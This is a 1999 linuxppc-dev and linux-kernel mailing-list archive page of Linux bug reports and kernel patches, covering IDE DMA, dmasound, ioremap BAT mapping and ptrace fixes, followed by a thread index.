>    kernel: Partition check:
>    kernel:  sda: sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10
>    kernel:  sdb: sdb1 sdb2 sdb3
>    kernel:  hda:hda: timeout waiting for DMA
>    kernel: hda: irq timeout: status=0x58 { DriveReady SeekComplete
> DataRequest }
>    kernel: hda: DMA disabled
>    kernel: ide0: reset: success
>    atd: atd startup succeeded
>    kernel:  hda1 hda2 hda3 hda4 hda5 hda6 hda7 hda8 hda9 hda10 hda11
> hda12 hda13
>    kernel: VFS: Mounted root (ext2 filesystem) readonly.
> With the May 21 kernel, I get only, like always before,
>    kernel: Partition check:
>    kernel:  sda: sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10
>    kernel:  sdb: sdb1 sdb2 sdb3
>    kernel:  hda: hda1 hda2 hda3 hda4 hda5 hda6 hda7 hda8 hda9 hda10
> hda11 hda12 hda13
>    kernel: VFS: Mounted root (ext2 filesystem) readonly.
> The effect of this is that the HD is slower with the newer kernel: I use
> hdparm -p /dev/hda to tune it and usually get 4.35 MB/sec instead of
> 1.88 MB/sec. With the new kernel, it stays at 1.88 MB/sec, whatever I
> try.
> 
> The second problem: I have a one-line script in /etc/rc.d that
> initializes the printer port:
>    stty raw 57600 crtscts -echo < /dev/ttyS1
> With the new kernel, the boot process hangs while trying to execute this
> script, and I have to do a hard reboot. If I comment this line out, the
> boot process succeeds. Afterwards, I can execute the script manually
> without problem.

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 59%]

* patch for dmasound bug
@ 1999-06-02 20:05 64% Ryan Nielsen
  1999-06-10 22:56 63% ` Alvin Brattli
  0 siblings, 1 reply; 200+ results
From: Ryan Nielsen @ 1999-06-02 20:05 UTC (permalink / raw)
  To: linuxppc-dev


This restores the rate/byteswap to normal after playing a beep
if you for example stop timidity, make a beep, resume, the sound
will be slower than normal (without this patch).

--- linux/drivers/sound/dmasound.c	1999/02/05 05:45:42	1.41
+++ linux/drivers/sound/dmasound.c	1999/06/02 19:42:08
@@ -3255,6 +3255,11 @@
 	save_flags(flags); cli();
 	if (beep_playing) {
 		st_le16(&beep_dbdma_cmd->command, DBDMA_STOP);
+		out_le32(&awacs_txdma->control, (RUN|PAUSE|FLUSH|WAKE) << 16);
+		out_le32(&awacs->control,
+			 (in_le32(&awacs->control) & ~0x1f00)
+			 | (awacs_rate_index << 8));
+		out_le32(&awacs->byteswap, sound.hard.format != AFMT_S16_BE);
 		beep_playing = 0;
 	}
 	restore_flags(flags);

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
@ 1999-06-03  1:24 64%   ` Ryuichi Oikawa
  1999-06-03  2:50 64%   ` Paul Mackerras
  1 sibling, 0 replies; 200+ results
From: Ryuichi Oikawa @ 1999-06-03  1:24 UTC (permalink / raw)
  To: costabel; +Cc: linuxppc-dev, cort


From: Martin Costabel <costabel@wanadoo.fr>
Subject: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)

> Index: arch/ppc/mm/init.c
> ===================================================================
> RCS file: /cvs/linux/linux/arch/ppc/mm/init.c,v
> retrieving revision 1.165
> retrieving revision 1.166
> diff -u -r1.165 -r1.166
> --- arch/ppc/mm/init.c  1999/05/14 22:37:29     1.165
> +++ arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
> @@ -1,5 +1,5 @@
>  /*
> - *  $Id: init.c,v 1.165 1999/05/14 22:37:29 cort Exp $
> + *  $Id: init.c,v 1.166 1999/05/22 18:18:30 cort Exp $
>   *
>   *  PowerPC version 
>   *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
> @@ -402,7 +402,7 @@
>     for (i = 0; i < size; i += PAGE_SIZE)
>         map_page(&init_task, v+i, p+i, flags);
>  out:
> -   return (void *) (v + (p & ~PAGE_MASK));
> +   return (void *) (v + (addr & ~PAGE_MASK));
>  }
>  
>  void iounmap(void *addr)
> 
> This patch had been proposed on May 21 by R. Oikawa and almost
> immediately been corrected, see
> http://lists.linuxppc.org/listarcs/linuxppc-user/199905/msg00680.html
> Unfortunately, the correction didn't make it into the vger tree. I don't
> know if the correction is good, but I never had problems with the
> version before the patch.
 Sorry, but please see the newer patch in msg00680.html. Simply replacing
-   return (void *) (v + (p & ~PAGE_MASK));
+   return (void *) (v + (addr & ~PAGE_MASK));
breaks iomap for BAT mapped devices(ex. mac-io/heathrow devices such as
ide, mace, bmac, etc.). Please use the newer one.


Regards,

Ryuichi Oikawa
roikawa@rr.iij4u.or.jp

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
  1999-06-03  1:24 64%   ` Ryuichi Oikawa
@ 1999-06-03  2:50 64%   ` Paul Mackerras
  1999-06-03  6:26 64%     ` Martin Costabel
  1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 2 replies; 200+ results
From: Paul Mackerras @ 1999-06-03  2:50 UTC (permalink / raw)
  To: costabel; +Cc: linuxppc-dev, cort


Martin Costabel <costabel@wanadoo.fr> wrote:

> A while ago I reported about boot problems with the vger 2.3.x kernel
> after May 22. Now I found that this same bug has crept into the "stable"
> tree, starting with 2.2.10 on May 30. After some digging, I found the
> culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
> follows:
[snip]
> -   return (void *) (v + (p & ~PAGE_MASK));
> +   return (void *) (v + (addr & ~PAGE_MASK));

In fact that patch is correct but you also need this patch (which I'm
about to check into vger):

--- linux/arch/ppc/mm/init.c	Sat May 29 20:24:09 1999
+++ pmac/arch/ppc/mm/init.c	Thu Jun  3 10:13:00 1999
@@ -371,7 +371,7 @@
 	 * same virt address (and this is contiguous).
 	 *  -- Cort
 	 */
-	if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
+	if ( (v = p_mapped_by_bats(p)) /*&& p_mapped_by_bats(p+size-1)*/ )
 		goto out;
 #endif /* CONFIG_8xx */
 	
Paul.

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-03  2:50 64%   ` Paul Mackerras
@ 1999-06-03  6:26 64%     ` Martin Costabel
  1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 0 replies; 200+ results
From: Martin Costabel @ 1999-06-03  6:26 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: linuxppc-dev, cort


Paul Mackerras wrote:
> 
> Martin Costabel <costabel@wanadoo.fr> wrote:
> 
> > A while ago I reported about boot problems with the vger 2.3.x kernel
> > after May 22. Now I found that this same bug has crept into the "stable"
> > tree, starting with 2.2.10 on May 30. After some digging, I found the
> > culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
> > follows:
> [snip]
> > -   return (void *) (v + (p & ~PAGE_MASK));
> > +   return (void *) (v + (addr & ~PAGE_MASK));
> 
> In fact that patch is correct but you also need this patch (which I'm
> about to check into vger):
> 
> --- linux/arch/ppc/mm/init.c    Sat May 29 20:24:09 1999
> +++ pmac/arch/ppc/mm/init.c     Thu Jun  3 10:13:00 1999
> @@ -371,7 +371,7 @@
>          * same virt address (and this is contiguous).
>          *  -- Cort
>          */
> -       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
> +       if ( (v = p_mapped_by_bats(p)) /*&& p_mapped_by_bats(p+size-1)*/ )
>                 goto out;
>  #endif /* CONFIG_8xx */

In the meantime I applied the second patch proposed by Ryuichi Oikawa, and it 
works for me. I am writing this running under 2.3.4. This patch is  

 diff -u -r1.166 init.c
--- arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
+++ arch/ppc/mm/init.c  1999/06/02 22:51:47
@@ -371,8 +371,10 @@
         * same virt address (and this is contiguous).
         *  -- Cort
         */
-       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
+       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ ){
+               addr = 0; /* v already contains page offset */
                goto out;
+       }
 #endif /* CONFIG_8xx */

        if (mem_init_done) {

Note that I don't understand what is going on here. I am just your 
typical dumb user :-)

--
Martin

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-03  2:50 64%   ` Paul Mackerras
  1999-06-03  6:26 64%     ` Martin Costabel
@ 1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 0 replies; 200+ results
From: Martin Costabel @ 1999-06-03 22:24 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: linuxppc-dev, cort


Paul Mackerras wrote:

> In fact that patch is correct but you also need this patch (which I'm
> about to check into vger):
[...]

2.3.5 is now running OK.

Thanks

--
Martin

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Bug report
@ 1999-06-07  8:54 64% Alexander Larsson
  1999-06-07 13:53 64% ` Dan Malek
  0 siblings, 1 reply; 200+ results
From: Alexander Larsson @ 1999-06-07  8:54 UTC (permalink / raw)
  To: dmalek, linuxppc-dev


In the embedded 2.2.5 sources i found the following in
arch/ppc/kernel/ppc-stub.c


static inline void set_msr(int msr)
{
	asm volatile("mfmsr %0" : : "r" (msr));
}

Shouldn't that be mtmsr?

/ Alex


[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: Bug report
  1999-06-07  8:54 64% Bug report Alexander Larsson
@ 1999-06-07 13:53 64% ` Dan Malek
  0 siblings, 0 replies; 200+ results
From: Dan Malek @ 1999-06-07 13:53 UTC (permalink / raw)
  To: Alexander Larsson; +Cc: linuxppc-dev


Alexander Larsson wrote:

> 
> In the embedded 2.2.5 sources i found the following in
> arch/ppc/kernel/ppc-stub.c
> 
> static inline void set_msr(int msr)
> {
>         asm volatile("mfmsr %0" : : "r" (msr));
> }
> 
> Shouldn't that be mtmsr?

Yes....Fortunately, it is only used in the kgbd portion of the
kernel, so normal operations are not affected.


	-- Dan

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* [PATCH] Re: Bug: Tracing recursive system calls
       [not found]     <E10r9LE-0006v4-00@the-village.bc.nu>
@ 1999-06-09  1:10 64% ` Nate Eldredge
  0 siblings, 0 replies; 200+ results
From: Nate Eldredge @ 1999-06-09  1:10 UTC (permalink / raw)
  To: Alan Cox; +Cc: linux-kernel

Alan Cox wrote:
> 
> > syscall_trace is in the fast path?!?  It only gets called when a process
> > is being traced, and nobody expects traced processes to run extremely
> > fast, do they?
> 
> Fast path for tracing syscalls. It would be nice to avoid a check every
> trace is what I mean.
> 
> > The problem isn't that the child thread is traced, it's that the `clone'
> > call itself from `kernel_thread' is traced.  So one would have to clear
> > the flag and then reset it in the parent.
> 
> Ok
> 
> > Besides, this doesn't suffice.  There are other places in the kernel
> > that make system calls (there's a `waitpid' in `request_module' for
> > instance).  We would need to find and change all of these and institute
> > a rule for the future, or else change the inline asm definitions in
> > asm/unistd.h.  Either seems a lot more complex.
> 
> Good point. My solution is simple elegant and wrong.

Then here is a patch.  It is against 2.2.10pre2, but I suspect it will
apply to other versions.  I make no claim for its elegance, etc, but it
works for me.  If anyone thinks of a better one, that would be nice.

The other arches should probably adopt similar changes.  I don't know
enough about anything but Intel to do it.

--- arch/i386/kernel/ptrace.c.bak       Mon Jun  7 13:37:01 1999
+++ arch/i386/kernel/ptrace.c   Tue Jun  8 17:51:36 1999
@@ -675,11 +675,14 @@
        return ret;
 }
 
-asmlinkage void syscall_trace(void)
+asmlinkage void syscall_trace(int unused)
 {
+       struct pt_regs *regs = (struct pt_regs *) &unused;
        if ((current->flags & (PF_PTRACED|PF_TRACESYS))
                        != (PF_PTRACED|PF_TRACESYS))
                return;
+       if (!user_mode(regs))
+               return; /* Don't trace the kernel's syscalls */
        current->exit_code = SIGTRAP;
        current->state = TASK_STOPPED;
        notify_parent(current, SIGCHLD);

-- 

Nate Eldredge
nate@cartsys.com

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 64%]

* TurboMax driver bug
@ 1999-06-09  3:28 59% Brian C Burke
  0 siblings, 0 replies; 200+ results
From: Brian C Burke @ 1999-06-09  3:28 UTC (permalink / raw)
  To: linuxppc-dev


I downloaded the vmlinux-blueg3v2 kernel from linuxppc.org and it supports
the turbomax card and attached maxtor drives on my beige G3 rev1. However
the cdrom drive at hdc shows up as a twin of the motherboard quantum drive
at hda and is not accessible. The can be seen in the startup printout that
follows.


AEC6210: IDE controller on PCI bus 00 dev 70
AEC6210: not 100% native mode: will probe irqs later
AEC6210: ROM enabled at 0x81800001
    ide2: BM-DMA at 0xfe000400-0xfe000407, BIOS settings: hde:DMA, hdf:pio
    ide3: BM-DMA at 0xfe000408-0xfe00040f, BIOS settings: hdg:DMA, hdh:pio
hda: QUANTUM FIREBALL ST4300A, ATA DISK drive
hdc: QUANTUM FIREBALL ST4300A, ATA DISK drive
hde: Maxtor 91728D8, ATA DISK drive
hdg: Maxtor 91728D8, ATA DISK drive
ide0 at 0xd4831000-0xd4831007,0xd4831160 on irq 13
ide1 at 0xd4835000-0xd4835007,0xd4835160 on irq 13 (shared with ide0)
ide2 at 0xfe000440-0xfe000447,0xfe000432 on irq 24
ide3 at 0xfe000420-0xfe000427,0xfe000412 on irq 24 (shared with ide2)
hda: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hdc: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hde: Maxtor 91728D8, 16479MB w/512kB Cache, CHS=33483/16/63, UDMA
hdg: Maxtor 91728D8, 16479MB w/512kB Cache, CHS=33483/16/63, UDMA


The 2.2.1 kernel which does not detect the TuboMax card detects the cdrom
at hdc correctly.

hda: QUANTUM FIREBALL ST4300A, ATA DISK drive
hdc: MATSHITA CR-585, ATAPI CDROM drive
ide0 at 0xd4831000-0xd4831007,0xd4831160 on irq 13
ide1 at 0xd4835000-0xd4835007,0xd4835160 on irq 14
hda: QUANTUM FIREBALL ST4300A, 4110MB w/81kB Cache, CHS=14848/9/63, (U)DMA
hdc: ATAPI 1X CD-ROM drive, 4224kB Cache
Uniform CDROM driver Revision: 2.54


If this list is not he correct place to report this bug please tell me where.

Thanks,
Brian


[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 59%]

* Re: patch for dmasound bug
  1999-06-02 20:05 64% patch for dmasound bug Ryan Nielsen
@ 1999-06-10 22:56 63% ` Alvin Brattli
  0 siblings, 0 replies; 200+ results
From: Alvin Brattli @ 1999-06-10 22:56 UTC (permalink / raw)
  To: Ryan Nielsen; +Cc: linuxppc-dev



OK, this reply comes a bit late, but I didn't try the patch
until now, so here goes:

Ryan Nielsen:
>
>This restores the rate/byteswap to normal after playing a beep
>if you for example stop timidity, make a beep, resume, the sound
>will be slower than normal (without this patch).

Although this patch might do what it was intended for, it has some
unwanted consequences on the PowerBook G3 Series, namely that one gets a
constant, really annoying hiss from the loudspeakers, most notably
during the boot sequence.  Without this patch, the hiss stops after a
system beep (like when you do an "echo ^G" in a shell), but now even
this does not help.  So, if this patch is included in the standard
distribution, I suspect we will hear a lot of complaints from PowerBook
G3 users.

To me, it seems like there is something wrong in the dmasound driver
that causes this hiss; it just doesn't switch off all sound when it's
supposed to.  I don't know enough about the workings of the audio
controller to go bug hunting here myself, so all I can do is just point
out that there is a problem here :(

>--- linux/drivers/sound/dmasound.c	1999/02/05 05:45:42	1.41
>+++ linux/drivers/sound/dmasound.c	1999/06/02 19:42:08
>@@ -3255,6 +3255,11 @@
> 	save_flags(flags); cli();
> 	if (beep_playing) {
> 		st_le16(&beep_dbdma_cmd->command, DBDMA_STOP);
>+		out_le32(&awacs_txdma->control, (RUN|PAUSE|FLUSH|WAKE) << 16);
>+		out_le32(&awacs->control,
>+			 (in_le32(&awacs->control) & ~0x1f00)
>+			 | (awacs_rate_index << 8));
>+		out_le32(&awacs->byteswap, sound.hard.format != AFMT_S16_BE);
> 		beep_playing = 0;
> 	}
> 	restore_flags(flags);



aLViN
-- 
:r .signature

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 63%]

Results 1-200 of ~385150   | reverse | options above
-- pct% links below jump to the message on this page, permalinks otherwise --
1996-08-14 22:58 64% bug in IRIX tftpd? David S. Miller
1996-08-14 23:46 64% ignore tftp bug report David S. Miller
1997-07-05 21:09 64% GCC bug Ralf Baechle
1997-08-10  2:06 64% Bottom half bug Ralf Baechle
1997-08-11 23:59 64% ` Miguel de Icaza
1997-08-12  4:07       ` Ralf Baechle
1997-08-12  4:07 64%     ` Ralf Baechle
1997-08-12  4:07 64%       ` Ralf Baechle
1997-08-12 16:26           ` Miguel de Icaza
1997-08-12 16:26 64%         ` Miguel de Icaza
1997-08-12 16:26 64%           ` Miguel de Icaza
1997-09-24  7:15 64% glibc 2.0.4 bug Ralf Baechle
1997-09-24 17:16 64% ` Ulrich Drepper
1997-10-14 23:58 64% static rpm bug, dynamic linker Ralf Baechle
1997-11-14 21:17     Pentium F00F bug Linux workaround Ariel Faigon
1997-11-14 21:17 55% ` Ariel Faigon
1997-11-14 21:17 55%   ` Ariel Faigon
1997-11-14 21:49 64%   ` David S. Miller
1997-11-14 22:01 64%   ` ralf
1997-11-14 22:25 45%   ` Alan Cox
1997-11-17 21:28     Pentium F00F bug Linux workaround; BSDI Response William Fisher
1997-11-17 21:28 50% ` William Fisher
1997-11-17 21:28 51%   ` William Fisher
1997-11-17 23:23 64%   ` David S. Miller
1997-11-17 23:56 64%     ` Alan Cox
1997-11-17 23:56 64%       ` Alan Cox
     [not found]     <19971205123800.34650@odo.amherst.com>
1997-12-06  6:16 64% ` Bug - Re: memleak 'DeLuxe' detector, 2.0.32, patch MOLNAR Ingo
1998-03-23 19:08 64% BIG FAT BUG with free_memory_available() Rik van Riel
1998-03-24 23:03 64% free_memory_available() bug in pre-91-1 H.H.vanRiel
1998-03-25 23:40 64% ` Linus Torvalds
1998-03-26  9:08 64%   ` Rik van Riel
1998-04-03 22:11     fwd: Andreessen Sees Mozilla-Linux Upset Of Windows ralf
1998-04-04 16:30 64% ` bug Ulf Carlsson
1998-04-04 15:59 64%   ` bug ralf
1998-05-13 17:10 64% Wrong 'w' and 'ps' (bug in procps?) Stephan van Hienen
1998-05-14  8:22 64% ` David S. Miller
1998-05-27  2:26 64% Assembler bug ralf
1998-06-03 17:56 63% Bug in do_munmap (fwd) Rik van Riel
1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
1998-06-15 22:44 54% Linux de4x5 driver bug? Mark J. Steiglitz
1998-07-10 19:49 64% GCC bug ralf
1998-09-04 18:51 64% Bug Ulf Carlsson
1998-09-04 21:25 64% ` Bug ralf
1998-10-20 23:50 61% Haifa scheduler bug in egcs 1.0.2 ralf
     [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
1998-10-22  0:44 62%   ` ralf
1998-10-22  6:26     (fwd) was bug in haifa scheduler (or not) Ariel Faigon
1998-10-22  6:26 64% ` Ariel Faigon
1998-10-22  6:26 64%   ` Ariel Faigon
1998-11-16  1:27 64% floppy driver bug: write-protect Brad Midgley
1999-01-15  2:18 63% ` David A. Gatwood
1999-01-15  3:30 64% ` Brad Midgley
1999-01-15  3:31 64% ` Paul Mackerras
1999-01-15 18:34 63%   ` David A. Gatwood
1998-12-02 20:36 64% [BUG] arp replies with BOOTP (nfsroot) Oren Laadan
1998-12-03 16:20 62% ` [BUG] arp replies with BOOTP [more info] Oren Laadan
1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
1998-12-27 17:59 64% ` Hollis R Blanchard
1998-12-28  4:07 64%   ` David Edelsohn
1998-12-27 19:13 64% ` David Edelsohn
1998-12-27 20:29 64%   ` Jens Ch. Restemeier
1998-12-28  4:19 64%     ` David Edelsohn
     [not found]     <199812290146.BAA12687@terrorserver.swansea.linux.org.uk>
1998-12-31 18:00 35% ` 2.2.0 Bug summary Andrea Arcangeli
1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
1999-01-01  0:16 64%     ` Steve Bergman
1999-01-01 17:16 64%       ` Andrea Arcangeli
1999-01-01 16:44 51%     ` Andrea Arcangeli
1999-01-01 20:02 38%       ` Andrea Arcangeli
1999-01-01 23:46 64%         ` Steve Bergman
1999-01-02  6:55 46%           ` Linus Torvalds
1999-01-02  8:33 62%             ` Steve Bergman
1999-01-02 14:48 64%             ` Andrea Arcangeli
1999-01-02 15:38 42%             ` Andrea Arcangeli
1999-01-02 18:10 64%               ` Linus Torvalds
1999-01-02 20:52 31%               ` Andrea Arcangeli
1999-01-03  2:59 32%                 ` Andrea Arcangeli
1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
1999-01-04 20:56 62%                     ` Linus Torvalds
1999-01-04 21:10 64%                       ` Rik van Riel
1999-01-04 22:04 64%                       ` Alan Cox
1999-01-04 21:55 64%                         ` Linus Torvalds
1999-01-04 22:51 64%                           ` Andrea Arcangeli
1999-01-05  0:32 30%                             ` Andrea Arcangeli
1999-01-05  0:52 64%                               ` Zlatko Calusic
1999-01-05  3:02 64%                               ` Zlatko Calusic
1999-01-05 11:49 64%                                 ` Andrea Arcangeli
1999-01-05 13:23 62%                                   ` Zlatko Calusic
1999-01-05 15:42 64%                                     ` Andrea Arcangeli
1999-01-05 16:16 59%                                       ` Zlatko Calusic
1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
1999-01-06 14:48 63%                                 ` Andrea Arcangeli
1999-01-06 23:31 58%                                   ` Andrea Arcangeli
1999-01-06 23:35 64%                                   ` Linus Torvalds
1999-01-07  4:30 62%                                     ` Eric W. Biederman
1999-01-07 17:56 48%                                       ` Linus Torvalds
1999-01-07 18:18 61%                                         ` Rik van Riel
1999-01-07 18:55 59%                                         ` Zlatko Calusic
1999-01-07 22:57 62%                                         ` Linus Torvalds
1999-01-08  1:16 60%                                           ` Linus Torvalds
1999-01-08 10:45 50%                                             ` Andrea Arcangeli
1999-01-08 19:06 64%                                               ` Linus Torvalds
1999-01-08  2:56 54%                                         ` Eric W. Biederman
1999-01-09  0:50 60%                                         ` David S. Miller
1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
1999-01-09  2:34 64%                                           ` Andrea Arcangeli
1999-01-09  9:30 63%                                             ` Stephen C. Tweedie
1999-01-09 12:11 64%                                           ` Andrea Arcangeli
1999-01-07 14:11 45%                                     ` Andrea Arcangeli
1999-01-07 18:19 55%                                       ` Linus Torvalds
1999-01-07 20:35 64%                                         ` Andrea Arcangeli
1999-01-07 23:51 64%                                           ` Linus Torvalds
1999-01-08  0:04 64%                                             ` Andrea Arcangeli
1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
1999-01-04 22:29 64%                       ` Andrea Arcangeli
1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
1999-01-02 20:04 64%             ` Steve Bergman
1999-01-02  3:03 38%         ` Andrea Arcangeli
1999-01-01 14:29 60% BUG: 2.2.0-pre2 on 5500 (and maybe 6500) Jens Ch. Restemeier
1999-01-01 19:44 64% ` Tom Rini
1999-01-02  9:31 64%   ` Jens Ch. Restemeier
1999-01-02  0:47 64% ` Ian K. Erickson
1999-01-03 22:00 64% Bug in the mmap code? Eric W. Biederman
1999-01-03 22:36 64% ` Eric W. Biederman
1999-01-07 15:53 64% a bug report radium
1999-01-08 23:47 64% ` Anton Blanchard
1999-01-13 17:43 59% [PATCH] Fix for swapin bug Stephen C. Tweedie
1999-01-13 19:42 64% Pre-R5 installer, some bug fixes Duncan Mak
1999-01-14 22:41 64% Bug in macserial.c Benjamin Herrenschmidt
1999-01-18 20:26     Removing swap lockmap Andrea Arcangeli
1999-01-18 22:24 64% ` BUG: deadlock in swap lockmap handling Alan Cox
     [not found]     <990119214302.n0001113.ph@mail.clara.net>
1999-01-27 23:55 59% ` Fwd: Inoffensive bug in mm/page_alloc.c Paul Hamshere
1999-01-30  1:52 64%   ` Benjamin C.R. LaHaise
1999-01-28 14:01 64% AWACS Bug Russell Hires
1999-02-02  4:53 64% ` Paul Mackerras
1999-01-28 19:03 62% Trevor Woerner
1999-01-30 15:05 64% bug in arch/ppc/mm/init.c Loic Prylli
1999-03-03  5:19 64% ` Paul Mackerras
1999-01-31 20:21 60% BUG in dmasound.c, allocating buffers Scott Sams
1999-02-03  2:23 63% CDROM driver bug? Sean Harding
1999-02-07 18:21 64% swapcache bug? Manfred Spraul
1999-02-07 21:30 64% ` Eric W. Biederman
1999-02-08 16:39 64% ` [PATCH] " Stephen C. Tweedie
1999-02-08 17:32 64%   ` Linus Torvalds
1999-02-08 17:51 60%     ` Stephen C. Tweedie
1999-02-08 18:48 62%       ` Linus Torvalds
1999-02-08 21:13 60%         ` Matti Aarnio
1999-02-09  7:15 64%         ` Eric W. Biederman
1999-02-09 16:32 64%           ` Linus Torvalds
1999-02-10  0:28 55%             ` Eric W. Biederman
     [not found]     <199902071436.PAA11929@sparta.research.kpn.com>
1999-02-08  5:12 64% ` MIPS egcs bug, was: working modutils for DECStation Linux ?? ralf
1999-02-14 22:50 64% Linux 2.2.1 and 2.2.0-pre5 bug ralf
1999-02-20 11:46 62% PATCH - bug in vfree Neil Booth
1999-02-20 12:14 64% ` Neil Booth
1999-02-27  2:39 64%   ` Neil Booth
1999-02-22 20:31 64% ` Kanoj Sarcar
1999-02-25  0:47 64% ` Andrea Arcangeli
     [not found]     <Pine.LNX.4.05.9902220432430.2138-100000@localhost.erols.com>
1999-02-22 14:36 64% ` egcs-1.1.1-1c bug (was Re: major ksyms problem) Tom Vier
1999-02-23  7:22 64%   ` Gary Thomas
1999-02-23 12:24 64%     ` Tom Vier
1999-02-23 20:53 64%       ` Tom Vier
     [not found]     ` <Pine.LNX.4.05.9902220928100.405-100000@localhost.erols.com >
1999-02-23 15:00 64%   ` Franz Sirl
1999-02-23 21:06 64%     ` Tom Vier
1999-02-23 21:15 64%       ` Franz Sirl
1999-02-24  9:53 64%         ` Gary Thomas
1999-02-24 16:06 64%           ` Franz Sirl
1999-02-25  2:20 64%           ` Tom Vier
1999-02-24 18:40 64%         ` Tom Vier
1999-02-24  7:14 64%       ` Michel Lanners
1999-02-22 14:36 59% I believe I found a bug in /arch/ppc/kernel/signal.c D.J. Barrow
1999-02-22 18:53 64% ` Benjamin Herrenschmidt
1999-02-23 14:35 64%   ` Lauro Whately
1999-02-24 12:45 64% D.J. Barrow
1999-02-25 11:39 57% signal handling bug demo D.J. Barrow
